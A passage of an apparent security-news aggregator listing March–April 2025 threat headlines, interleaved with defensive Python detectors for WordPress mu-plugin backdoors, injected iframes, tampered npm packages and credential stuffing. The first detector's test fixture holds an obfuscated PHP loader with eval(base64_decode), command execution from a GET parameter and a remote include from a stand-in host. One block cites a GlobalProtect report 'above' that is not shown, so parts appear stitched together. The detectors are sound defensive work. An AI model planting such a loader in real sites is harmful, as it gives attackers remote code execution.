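// Constructed sample: a harmless customization an admin placed here on purpose.
add_filter('login_headerurl', function () { return home_url(); });
"""

MALICIOUS_PHP = """<?php
// Constructed sample: obfuscated loader of the kind dropped into mu-plugins.
$k = "cGF5bG9hZA==";
eval(base64_decode($k));
$f = "str_rot13";
$f($_GET["c"]);
@include("https://drop.example.invalid/stage2.txt");
"""


def build_sample_site():
    """Create a throwaway WordPress-like tree with one benign and one suspicious mu-plugin."""
    root = Path(tempfile.mkdtemp(prefix="wp-"))
    mu = root / "wp-content" / "mu-plugins"
    mu.mkdir(parents=True)
    (mu / "custom-login.php").write_text(BENIGN_PHP)
    (mu / "index.php").write_text(MALICIOUS_PHP)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    print(scan_mu_plugins(site))
    print(unexpected_files(site, ["custom-login.php"]))
```

The inventory check is the more reliable of the two: obfuscation indicators change between campaigns, but a file the operator never placed in mu-plugins is suspicious whatever it contains.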

Published: 2025-03-31T17:34:00



The Hacker News

Weekly Recap: Chrome 0-Day, IngressNightmare, Solar Bugs, DNS Tactics, and More

Every week, someone somewhere slips up and threat actors slip in. A misconfigured setting, an overlooked vulnerability, or a too-convenient cloud tool becomes the perfect entry point. But what happens when the hunters become the hunted? Or when old malware resurfaces with new tricks? Step behind the curtain with us this week as we explore breaches born from routine oversights and the unexpected

Published: 2025-03-31T16:55:00



The Hacker News

5 Impactful AWS Vulnerabilities You're Responsible For

If you're using AWS, it's easy to assume your cloud security is handled - but that's a dangerous misconception. AWS secures its own infrastructure, but security within a cloud environment remains the customer’s responsibility. Think of AWS security like protecting a building: AWS provides strong walls and a solid roof, but it's up to the customer to handle the locks, install the alarm systems,

Published: 2025-03-31T16:30:00



The Hacker News

Russia-Linked Gamaredon Uses Troop-Related Lures to Deploy Remcos RAT in Ukraine

Entities in Ukraine have been targeted as part of a phishing campaign designed to distribute a remote access trojan called Remcos RAT. "The file names use Russian words related to the movement of troops in Ukraine as a lure," Cisco Talos researcher Guilherme Venere said in a report published last week. "The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to

Published: 2025-03-31T15:00:00



The Hacker News

RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell Features

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has shed light on a new malware called RESURGE that has been deployed as part of exploitation activity targeting a now-patched security flaw in Ivanti Connect Secure (ICS) appliances. "RESURGE contains capabilities of the SPAWNCHIMERA malware variant, including surviving reboots; however, RESURGE contains distinctive commands that

Published: 2025-03-30T10:37:00



The Hacker News

New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto Credentials

Cybersecurity researchers have discovered a new Android banking malware called Crocodilus that's primarily designed to target users in Spain and Turkey. "Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from the outset, equipped with modern techniques such as remote control, black screen overlays, and advanced data harvesting via accessibility logging,"

Published: 2025-03-29T12:58:00



The Hacker News

BlackLock Ransomware Exposed After Researchers Exploit Leak Site Vulnerability

In what's an instance of hacking the hackers, threat hunters have managed to infiltrate the online infrastructure associated with a ransomware group called BlackLock, uncovering crucial information about their modus operandi in the process. Resecurity said it identified a security vulnerability in the data leak site (DLS) operated by the e-crime group that made it possible to extract

Published: 2025-03-29T09:22:00



The Hacker News

Researchers Uncover 46 Critical Flaws in Solar Power Systems From Sungrow, Growatt, and SMA

Cybersecurity researchers have disclosed 46 new security flaws in products from three solar power system vendors, Sungrow, Growatt, and SMA, that could be exploited by a bad actor to seize control of devices or execute code remotely, posing severe risks to electrical grids.  The vulnerabilities have been collectively codenamed SUN:DOWN by Forescout Vedere Labs. "The new vulnerabilities can

Published: 2025-03-28T18:51:00



The Hacker News

CoffeeLoader Uses GPU-Based Armoury Packer to Evade EDR and Antivirus Detection

Cybersecurity researchers are calling attention to a new sophisticated malware called CoffeeLoader that's designed to download and execute secondary payloads. The malware, according to Zscaler ThreatLabz, shares behavioral similarities with another known malware loader known as SmokeLoader.  "The purpose of the malware is to download and execute second-stage payloads while evading

Published: 2025-03-28T17:27:00



The Hacker News

Product Walkthrough: How Datto BCDR Delivers Unstoppable Business Continuity

Long gone are the days when a simple backup in a data center was enough to keep a business secure. While backups store information, they do not guarantee business continuity during a crisis. With IT disasters far too common and downtime burning through budgets, modern IT environments require solutions that go beyond storage and enable instant recovery to minimize downtime and data loss. This is

Published: 2025-03-28T15:45:00



The Hacker News

PJobRAT Malware Campaign Targeted Taiwanese Users via Fake Chat Apps

An Android malware family previously observed targeting Indian military personnel has been linked to a new campaign likely aimed at users in Taiwan under the guise of chat apps. "PJobRAT can steal SMS messages, phone contacts, device and app information, documents, and media files from infected Android devices," Sophos security researcher Pankaj Kohli said in a Thursday analysis. PJobRAT, first

Published: 2025-03-28T13:36:00



The Hacker News

Nine-Year-Old npm Packages Hijacked to Exfiltrate API Keys via Obfuscated Scripts

Cybersecurity researchers have discovered several cryptocurrency packages on the npm registry that have been hijacked to siphon sensitive information such as environment variables from compromised systems. "Some of these packages have lived on npmjs.com for over 9 years, and provide legitimate functionality to blockchain developers," Sonatype researcher Ax Sharma said. "However, [...] the latest

Published: 2025-03-28T11:36:00



The Hacker News

Mozilla Patches Critical Firefox Bug Similar to Chrome’s Recent Zero-Day Vulnerability

Mozilla has released updates to address a critical security flaw impacting its Firefox browser for Windows, merely days after Google patched a similar flaw in Chrome that came under active exploitation as a zero-day. The security vulnerability, CVE-2025-2857, has been described as a case of an incorrect handle that could lead to a sandbox escape. "Following the recent Chrome sandbox escape (

Published: 2025-03-28T11:14:00



The Hacker News

New Morphing Meerkat Phishing Kit Mimics 114 Brands Using Victims’ DNS Email Records

Cybersecurity researchers have shed light on a new phishing-as-a-service (PhaaS) platform that leverages the Domain Name System (DNS) mail exchange (MX) records to serve fake login pages that impersonate about 114 brands. DNS intelligence firm Infoblox is tracking the actor behind the PhaaS, the phishing kit, and the related activity under the moniker Morphing Meerkat. "The threat actor behind

Published: 2025-03-27T22:28:00



The Hacker News

Hackers Repurpose RansomHub's EDRKillShifter in Medusa, BianLian, and Play Attacks

A new analysis has uncovered connections between affiliates of RansomHub and other ransomware groups like Medusa, BianLian, and Play. The connection stems from the use of a custom tool that's designed to disable endpoint detection and response (EDR) software on compromised hosts, according to ESET. The EDR killing tool, dubbed EDRKillShifter, was first documented as used by RansomHub actors in

Published: 2025-03-27T19:40:00



The Hacker News

APT36 Spoofs India Post Website to Infect Windows and Android Users with Malware

An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India's public sector postal system as part of a campaign designed to infect both Windows and Android users in the country. Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as

Published: 2025-03-27T18:01:00



The Hacker News

New Report Explains Why CASB Solutions Fail to Address Shadow SaaS and How to Fix It

Whether it’s CRMs, project management tools, payment processors, or lead management tools - your workforce is using SaaS applications by the pound. Organizations often rely on traditional CASB solutions for protecting against malicious access and data exfiltration, but these fall short for protecting against shadow SaaS, data damage, and more. A new report, Understanding SaaS Security Risks: Why

Published: 2025-03-27T16:55:00



The Hacker News

Top 3 MS Office Exploits Hackers Use in 2025: Stay Alert!

Hackers have long used Word and Excel documents as delivery vehicles for malware, and in 2025, these tricks are far from outdated. From phishing schemes to zero-click exploits, malicious Office files are still one of the easiest ways into a victim’s system. Here are the top three Microsoft Office-based exploits still making the rounds this year and what you need to know to avoid them. 1.

Published: 2025-03-27T15:30:00



The Hacker News

150,000 Sites Compromised by JavaScript Injection Promoting Chinese Gambling Platforms

An ongoing campaign that infiltrates legitimate websites with malicious JavaScript injects to promote Chinese-language gambling platforms has ballooned to compromise approximately 150,000 sites to date. "The threat actor has slightly revamped their interface but is still relying on an iframe injection to display a full-screen overlay in the visitor's browser," c/side security analyst Himanshu
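The tell described here, an injected iframe from a third-party origin styled to cover the whole viewport, is something a site owner can check for in their own rendered HTML. The following is an added example in Python (not c/side's scanner) that collects `script` and `iframe` tags, flags those loading from hosts the site does not own, and separately flags iframes whose inline style makes them a fixed full-screen overlay. The sample page and the host names in it are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

OVERLAY_RX = re.compile(r"position\s*:\s*fixed", re.I)
FULL_SIZE_RX = re.compile(r"(?:width|height)\s*:\s*100\s*(?:%|vw|vh)", re.I)


class _TagCollector(HTMLParser):
    """Collect the start tags that can pull in third-party content."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            self.tags.append((tag, dict(attrs)))


def find_injections(html, site_host, allowed_hosts=()):
    """Flag script/iframe tags from hosts the site does not own, and full-screen fixed iframes."""
    parser = _TagCollector()
    parser.feed(html)
    trusted = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
    findings = []
    for tag, attrs in parser.tags:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname  # None for relative URLs, i.e. same-origin
        reasons = []
        if host and host.lower() not in trusted:
            reasons.append("external-origin")
        style = attrs.get("style") or ""
        if tag == "iframe" and OVERLAY_RX.search(style) and FULL_SIZE_RX.search(style):
            reasons.append("full-screen-overlay")
        if reasons:
            findings.append({"tag": tag, "src": src, "reasons": reasons})
    return findings


# Constructed sample page: the site's own script, one approved CDN, and two injected tags.
SAMPLE_HTML = """<!doctype html>
<html><head>
<script src="/assets/app.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
<script src="https://tj.example-stats.invalid/t.js"></script>
</head><body>
<h1>Store</h1>
<iframe src="https://play.example-bet.invalid/"
        style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:2147483647;border:0">
</iframe>
</body></html>
"""


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_HTML, "www.example.com", allowed_hosts=["cdn.example.com"]):
        print(hit)
```

Run this against the HTML the server actually emits, not the source in the repository: the campaign modifies what visitors receive, so a diff between the two is itself a finding.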

Published: 2025-03-27T13:43:00



The Hacker News

CISA Warns of Sitecore RCE Flaws; Active Exploits Hit Next.js and DrayTek Devices

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two six-year-old security flaws impacting Sitecore CMS and Experience Platform (XP) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities are listed below - CVE-2019-9874 (CVSS score: 9.8) - A deserialization vulnerability in the Sitecore.Security.AntiCSRF

Published: 2025-03-27T11:53:00



The Hacker News

NetApp SnapCenter Flaw Could Let Users Gain Remote Admin Access on Plug-In Systems

A critical security flaw has been disclosed in NetApp SnapCenter that, if successfully exploited, could allow privilege escalation. SnapCenter is an enterprise-focused software that's used to manage data protection across applications, databases, virtual machines, and file systems, offering the ability to backup, restore, and clone data resources. The vulnerability, tracked as

Published: 2025-03-27T11:36:00



The Hacker News

New SparrowDoor Backdoor Variants Found in Attacks on U.S. and Mexican Organizations

The Chinese threat actor known as FamousSparrow has been linked to a cyber attack targeting a trade group in the United States and a research institute in Mexico to deliver its flagship backdoor SparrowDoor and ShadowPad. The activity, observed in July 2024, marks the first time the hacking crew has deployed ShadowPad, a malware widely shared by Chinese state-sponsored actors. "FamousSparrow

Published: 2025-03-26T22:29:00



The Hacker News

EncryptHub Exploits Windows Zero-Day to Deploy Rhadamanthys and StealC Malware

The threat actor known as EncryptHub exploited a recently-patched security vulnerability in Microsoft Windows as a zero-day to deliver a wide range of malware families, including backdoors and information stealers such as Rhadamanthys and StealC. "In this attack, the threat actor manipulates .msc files and the Multilingual User Interface Path (MUIPath) to download and execute malicious payload,

Published: 2025-03-26T19:23:00



The Hacker News

RedCurl Shifts from Espionage to Ransomware with First-Ever QWCrypt Deployment

The Russian-speaking hacking group called RedCurl has been linked to a ransomware campaign for the first time, marking a departure in the threat actor's tradecraft. The activity, observed by Romanian cybersecurity company Bitdefender, involves the deployment of a never-before-seen ransomware strain dubbed QWCrypt. RedCurl, also called Earth Kapre and Red Wolf, has a history of orchestrating

Published: 2025-03-26T19:13:00



The Hacker News

Malicious npm Package Modifies Local 'ethers' Library to Launch Reverse Shell Attacks

Cybersecurity researchers have discovered two malicious packages on the npm registry that are designed to infect another locally installed package, underscoring the continued evolution of software supply chain attacks targeting the open-source ecosystem. The packages in question are ethers-provider2 and ethers-providerz, with the former downloaded 73 times to date since it was published on
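A package that patches a *different* installed package defeats the usual lockfile check: `ethers` itself is the genuine registry version, so its recorded integrity hash still matches the tarball, while the files on disk no longer match what was unpacked. What catches this is a snapshot of the installed tree taken right after a clean install and compared again later. The following is an added example in Python, not npm's or Sonatype's tooling; `build_sample` creates a constructed stand-in for node_modules/ethers in a temporary directory and `tamper_sample` simulates the post-install modification the article describes.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(pkg_dir):
    """Map every file under an installed package to its SHA-256 (relative POSIX paths as keys)."""
    pkg_dir = Path(pkg_dir)
    return {
        p.relative_to(pkg_dir).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(pkg_dir.rglob("*")) if p.is_file()
    }


def diff_against(pkg_dir, baseline):
    """Compare the package on disk with a baseline snapshot taken right after a clean install."""
    now = snapshot(pkg_dir)
    return {
        "modified": sorted(p for p in now if p in baseline and now[p] != baseline[p]),
        "added": sorted(p for p in now if p not in baseline),
        "removed": sorted(p for p in baseline if p not in now),
    }


def build_sample():
    """Constructed stand-in for node_modules/ethers immediately after `npm ci`; returns (dir, baseline)."""
    pkg = Path(tempfile.mkdtemp(prefix="nm-")) / "node_modules" / "ethers"
    (pkg / "lib").mkdir(parents=True)
    (pkg / "package.json").write_text('{"name": "ethers", "version": "0.0.0-sample"}\n')
    (pkg / "lib" / "index.js").write_text('module.exports = { provider: require("./provider") };\n')
    (pkg / "lib" / "provider.js").write_text("module.exports = function provider() {};\n")
    return pkg, snapshot(pkg)


def tamper_sample(pkg):
    """Simulate a malicious sibling package's install script: patch one file, drop a loader."""
    index = pkg / "lib" / "index.js"
    index.write_text(index.read_text() + 'require("./loader");\n')
    (pkg / "lib" / "loader.js").write_text("// constructed placeholder for injected code\n")


if __name__ == "__main__":
    pkg, baseline = build_sample()
    print("clean:", diff_against(pkg, baseline))
    tamper_sample(pkg)
    print("after tamper:", diff_against(pkg, baseline))
```

In CI the baseline belongs in an artifact produced by the install step, and the comparison runs before the build or test step; a `modified` or `added` entry in a package you did not upgrade is a stop-the-line event, because the lockfile will still say everything is fine.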

Published: 2025-03-26T17:30:00



The Hacker News

Sparring in the Cyber Ring: Using Automated Pentesting to Build Resilience

“A boxer derives the greatest advantage from his sparring partner.” (Epictetus, 50–135 AD) Hands up. Chin tucked. Knees bent. The bell rings, and both boxers meet in the center and circle. Red throws out three jabs, feints a fourth, and BANG, lands a right hand on Blue down the center. This wasn’t Blue’s first day and despite his solid defense in front of the mirror, he feels the pressure.

Published: 2025-03-26T16:55:00



The Hacker News

Zero-Day Alert: Google Releases Chrome Patch for Exploit Used in Russian Espionage Attacks

Google has released out-of-band fixes to address a high-severity security flaw in its Chrome browser for Windows that has been exploited in the wild as part of attacks targeting organizations in Russia.  The vulnerability, tracked as CVE-2025-2783 (CVSS score: 8.3), has been described as a case of "incorrect handle provided in unspecified circumstances in Mojo on Windows." Mojo

Published: 2025-03-26T16:40:00



The Hacker News

How PAM Mitigates Insider Threats: Preventing Data Breaches, Privilege Misuse, and More

When people think of cybersecurity threats, they often picture external hackers breaking into networks. However, some of the most damaging breaches stem from within organizations. Whether through negligence or malicious intent, insiders can expose your organization to significant cybersecurity risks. According to Verizon's 2024 Data Breach Investigations Report, 57% of companies experience over

Published: 2025-03-26T15:45:00



The Hacker News

Hackers Using E-Crime Tool Atlantis AIO for Credential Stuffing on 140+ Platforms

Threat actors are leveraging an e-crime tool called Atlantis AIO Multi-Checker to automate credential stuffing attacks, according to findings from Abnormal Security. Atlantis AIO "has emerged as a powerful weapon in the cybercriminal arsenal, enabling attackers to test millions of stolen credentials in rapid succession," the cybersecurity company said in an analysis. Credential stuffing is a
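Both the GlobalProtect login-scanning spike reported above (24,000 source IPs probing portals) and Atlantis AIO-style credential stuffing leave the same kind of trace in an authentication log: the stuffing tool fails against many *different* usernames from one source in a short span, and a coordinated scan shows up as an unusual number of *distinct* sources in a short window. The following is an added example in Python, not Abnormal Security's or Palo Alto Networks' detection logic; the log format is a constructed key=value layout, the IP addresses are documentation ranges, and the thresholds are parameters to tune against your own baseline.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample lines in a made-up key=value portal log format (not a vendor format).
SAMPLE_LOG = """\
2025-04-01T10:00:01Z src=203.0.113.5 user=alice result=fail
2025-04-01T10:00:02Z src=203.0.113.5 user=bob result=fail
2025-04-01T10:00:03Z src=203.0.113.5 user=carol result=fail
2025-04-01T10:00:04Z src=203.0.113.5 user=dave result=fail
2025-04-01T10:00:05Z src=203.0.113.5 user=erin result=fail
2025-04-01T10:00:06Z src=203.0.113.5 user=frank result=fail
2025-04-01T10:01:10Z src=198.51.100.20 user=alice result=fail
2025-04-01T10:01:15Z src=198.51.100.20 user=alice result=fail
2025-04-01T10:01:30Z src=198.51.100.20 user=alice result=success
2025-04-01T10:31:00Z src=192.0.2.11 user=test result=fail
2025-04-01T10:31:05Z src=192.0.2.12 user=test result=fail
2025-04-01T10:31:09Z src=192.0.2.13 user=admin result=fail
2025-04-01T10:32:00Z src=192.0.2.14 user=test result=fail
2025-04-01T10:33:45Z src=192.0.2.15 user=guest result=fail
"""

LINE_RX = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$")


def parse_log(text):
    """Yield (epoch_seconds, src, user, result) for each well-formed line; skip the rest."""
    events = []
    for line in text.splitlines():
        m = LINE_RX.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc).timestamp()
        events.append((ts, m["src"], m["user"], m["result"]))
    return events


def credential_stuffing_suspects(events, window_s=300, min_distinct_users=5):
    """Sources that fail against >= min_distinct_users different usernames within any window_s span."""
    per_ip = defaultdict(list)
    for ts, src, user, result in events:
        if result == "fail":
            per_ip[src].append((ts, user))
    suspects = {}
    for src, fails in per_ip.items():
        fails.sort()
        in_window = defaultdict(int)  # user -> failures currently inside the sliding window
        lo, best = 0, 0
        for ts, user in fails:
            in_window[user] += 1
            while fails[lo][0] < ts - window_s:  # drop events older than the window
                old = fails[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            best = max(best, len(in_window))
        if best >= min_distinct_users:
            suspects[src] = best
    return suspects


def distinct_source_spike(events, bucket_s=600, threshold=3):
    """Fixed time buckets in which more than `threshold` distinct sources touched the portal."""
    buckets = defaultdict(set)
    for ts, src, _, _ in events:
        buckets[int(ts // bucket_s) * bucket_s].add(src)
    return {
        datetime.fromtimestamp(start, timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"): len(ips)
        for start, ips in sorted(buckets.items()) if len(ips) > threshold
    }


if __name__ == "__main__":
    ev = parse_log(SAMPLE_LOG)
    print("stuffing:", credential_stuffing_suspects(ev))
    print("scan spike:", distinct_source_spike(ev))
```

The user who mistypes a password three times (198.51.100.20) trips neither rule, which is the point of keying the first rule on distinct usernames rather than on raw failure counts. Stuffing tools that rotate through proxies will dilute the per-IP view, so in practice the first rule is also worth running keyed on ASN or on the client fingerprint.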

Published: 2025-03-26T14:23:00



The Hacker News

New Security Flaws Found in VMware Tools and CrushFTP: High Risk, PoC Released

Broadcom has issued security patches to address a high-severity security flaw in VMware Tools for Windows that could lead to an authentication bypass. Tracked as CVE-2025-22230, the vulnerability is rated 7.8 on the ten-point Common Vulnerability Scoring System (CVSS). "VMware Tools for Windows contains an authentication bypass vulnerability due to improper access control," Broadcom said in an

Published: 2025-03-26T09:50:00



The Hacker News

Researchers Uncover ~200 Unique C2 Domains Linked to Raspberry Robin Access Broker

A new investigation has unearthed nearly 200 unique command-and-control (C2) domains associated with a malware called Raspberry Robin. "Raspberry Robin (also known as Roshtyak or Storm-0856) is a complex and evolving threat actor that provides initial access broker (IAB) services to numerous criminal groups, many of which have connections to Russia," Silent Push said in a report shared with The

Published: 2025-03-25T19:09:00



The Hacker News

Chinese Hackers Breach Asian Telecom, Remain Undetected for Over 4 Years

A major telecommunications company located in Asia was allegedly breached by Chinese state-sponsored hackers who spent over four years inside its systems, according to a new report from incident response firm Sygnia. The cybersecurity company is tracking the activity under the name Weaver Ant, describing the threat actor as stealthy and highly persistent. The name of the telecom provider was not

Published: 2025-03-25T17:24:00



The Hacker News

AI-Powered SaaS Security: Keeping Pace with an Expanding Attack Surface

Organizations now use an average of 112 SaaS applications, a number that keeps growing. In a 2024 study, 49% of 644 respondents who frequently used Microsoft 365 believed that they had less than 10 apps connected to the platform, despite the fact that aggregated data indicated over 1,000+ Microsoft 365 SaaS-to-SaaS connections on average per deployment. And that’s just one major SaaS provider.

Published: 2025-03-25T16:30:00



The Hacker News

Hackers Use .NET MAUI to Target Indian and Chinese Users with Fake Banking, Social Apps

Cybersecurity researchers are calling attention to an Android malware campaign that leverages Microsoft's .NET Multi-platform App UI (.NET MAUI) framework to create bogus banking and social media apps targeting Indian and Chinese-speaking users. "These threats disguise themselves as legitimate apps, targeting users to steal sensitive information," McAfee Labs researcher Dexter Shin said. .NET

Published: 2025-03-25T14:40:00



The Hacker News

INTERPOL Arrests 306 Suspects, Seizes 1,842 Devices in Cross-Border Cybercrime Bust

Law enforcement authorities in seven African countries have arrested 306 suspects and confiscated 1,842 devices as part of an international operation codenamed Red Card that took place between November 2024 and February 2025. The coordinated effort "aims to disrupt and dismantle cross-border criminal networks which cause significant harm to individuals and businesses," INTERPOL said, adding it

Published: 2025-03-25T12:03:00



The Hacker News

Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication

A set of five critical security shortcomings have been disclosed in the Ingress NGINX Controller for Kubernetes that could result in unauthenticated remote code execution, putting over 6,500 clusters at immediate risk by exposing the component to the public internet. The vulnerabilities (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098, and CVE-2025-1974), assigned a CVSS score of

Published: 2025-03-25T00:25:00



The Hacker News

Microsoft Adds Inline Data Protection to Edge for Business to Block GenAI Data Leaks

Microsoft on Monday announced a new feature called inline data protection for its enterprise-focused Edge for Business web browser. The native data security control is designed to prevent employees from sharing sensitive company-related data into consumer generative artificial intelligence (GenAI) apps like OpenAI ChatGPT, Google Gemini, and DeepSeek. The list will be expanded over time to

Published: 2025-03-24T21:49:00



The Hacker News

VanHelsing RaaS Launch: 3 Victims, $5K Entry Fee, Multi-OS, and Double Extortion Tactics

A ransomware-as-a-service (RaaS) operation called VanHelsing has already claimed three victims since it launched on March 7, 2025, demanding ransoms as high as $500,000. "The RaaS model allows a wide range of participants, from experienced hackers to newcomers, to get involved with a $5,000 deposit. Affiliates keep 80% of the ransom payments, while the core operators earn 20%," Check Point said

Published: 2025-03-24T19:36:00



The Hacker News

THN Weekly Recap: GitHub Supply Chain Attack, AI Malware, BYOVD Tactics, and More

A quiet tweak in a popular open-source tool opened the door to a supply chain breach; what started as a targeted attack quickly spiraled, exposing secrets across countless projects. That wasn’t the only stealth move. A new all-in-one malware is silently stealing passwords, crypto, and control while hiding in plain sight. And over 300 Android apps joined the chaos, running ad fraud at scale behind

Published: 2025-03-24T17:05:00



The Hacker News

VSCode Marketplace Removes Two Extensions Deploying Early-Stage Ransomware

Cybersecurity researchers have uncovered two malicious extensions in the Visual Studio Code (VSCode) Marketplace that are designed to deploy ransomware that's under development to its users. The extensions, named "ahban.shiba" and "ahban.cychelloworld," have since been taken down by the marketplace maintainers. Both the extensions, per ReversingLabs, incorporate code that's designed to invoke a

Published: 2025-03-24T16:40:00



The Hacker News

How to Balance Password Security Against User Experience

If given the choice, most users are likely to favor a seamless experience over complex security measures, as they don’t prioritize strong password security. However, balancing security and usability doesn’t have to be a zero-sum game. By implementing the right best practices and tools, you can strike a balance between robust password security and a frictionless user experience (UX). This article

Published: 2025-03-24T16:30:00



Security Affairs

Microsoft warns of critical flaw in Canon printer drivers

Microsoft’s offensive security team discovered a critical code execution vulnerability impacting Canon printer drivers. Researchers at Microsoft’s Offensive Research and Security Engineering (MORSE) team have discovered a critical code execution vulnerability, tracked as CVE-2025-1268 (CVSS score of 9.4), impacting Canon printer drivers. The vulnerability is an out-of-bounds issue that resides in certain printer drivers for […]

Published: 2025-04-01T18:32:12



Security Affairs

CrushFTP CVE-2025-2825 flaw actively exploited in the wild

Attackers exploit CrushFTP CVE-2025-2825 flaw, enabling unauthenticated access to unpatched devices using public proof-of-concept code. Threat actors are exploiting a critical authentication bypass vulnerability, tracked as CVE-2025-2825, in the CrushFTP file transfer software. Attackers are using exploits based on publicly available proof-of-concept exploit code. The vulnerability impacts CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0, it […]

Published: 2025-04-01T14:09:54



Security Affairs

France’s antitrust authority fines Apple €150M for issues related to its App Tracking Transparency

France fines Apple €150M for abusing its dominance in ATT consent practices on iOS and iPadOS from 2021 to 2023. France’s Autorité de la concurrence fined Apple €150M for abusing its dominance in App Tracking Transparency (ATT) consent practices on iOS and iPadOS between April 26, 2021 and July 25, 2023. Apple launched ATT with […]

Published: 2025-04-01T11:30:59



Security Affairs

Hiding WordPress malware in the mu-plugins directory to avoid detection

Sucuri researchers spotted threat actors deploying WordPress malware in the mu-plugins directory to evade security checks. In February, Sucuri warned of threat actors exploiting WordPress mu-plugins, which auto-load without activation, to maintain persistence and evade detection by hiding backdoors in the plugin directory. “Unlike regular plugins, must-use plugins are automatically loaded on every page load, […]

Published: 2025-04-01T07:45:44



Security Affairs

U.S. CISA adds Cisco Smart Licensing Utility flaw to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Cisco Smart Licensing Utility flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Cisco Smart Licensing Utility vulnerability, tracked as CVE-2024-20439, to its Known Exploited Vulnerabilities (KEV) catalog. Last week, Cisco disclosed two vulnerabilities in its Smart Licensing Utility: CVE-2024-20439, […]

Published: 2025-03-31T19:56:01



Security Affairs

Russia-linked Gamaredon targets Ukraine with Remcos RAT

Russia-linked Gamaredon targets Ukraine with a phishing campaign using troop-related lures to deploy the Remcos RAT via PowerShell downloader. Talos researchers warn that Russia-linked APT group Gamaredon (a.k.a. Armageddon, Primitive Bear, ACTINIUM, Callisto) targets Ukraine with a phishing campaign. The cyberespionage group is behind a long series of spear-phishing attacks targeting Ukrainian entities, and organizations related […]

Published: 2025-03-31T13:52:32



Security Affairs

CoffeeLoader uses a GPU-based packer to evade detection

CoffeeLoader is a sophisticated malware that uses numerous techniques to bypass security solutions, Zscaler ThreatLabz warns. Zscaler ThreatLabz discovered CoffeeLoader, a malware family active since September 2024 that uses multiple techniques to evade endpoint security while downloading second-stage payloads. The advanced techniques used by the malware include GPU-based packing, call stack spoofing, sleep obfuscation, and […]

Published: 2025-03-31T13:35:30



Security Affairs

Morphing Meerkat phishing kits exploit DNS MX records

Morphing Meerkat phishing kits exploit DNS MX records to deliver spoofed login pages, targeting over 100 brands. Infoblox researchers discovered a new phishing-as-a-service (PhaaS) platform that generated multiple phishing kits, called Morphing Meerkat, using DNS mail exchange (MX) records to deliver fake login pages and targeting over 100 brands. Threat actors are exploiting DNS techniques […]

Published: 2025-03-31T08:30:57



Security Affairs

CISA warns of RESURGE malware exploiting Ivanti flaw

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of RESURGE malware, targeting a vulnerability in Ivanti Connect Secure (ICS) appliances. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) published a Malware Analysis Report (MAR) on a new malware called RESURGE. The malicious code has been used in attacks targeting the flaw CVE-2025-0282 in Ivanti Connect […]

Published: 2025-03-30T23:11:20



Security Affairs

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 39

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape:
Microsoft Trusted Signing service abused to code-sign malware
Shedding light on the ABYSSWORKER driver
VSCode Marketplace Removes Two Extensions Deploying Early-Stage Ransomware
New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI
Raspberry Robin: Copy […]

Published: 2025-03-30T14:12:33

© Segmentation Fault. All rights reserved.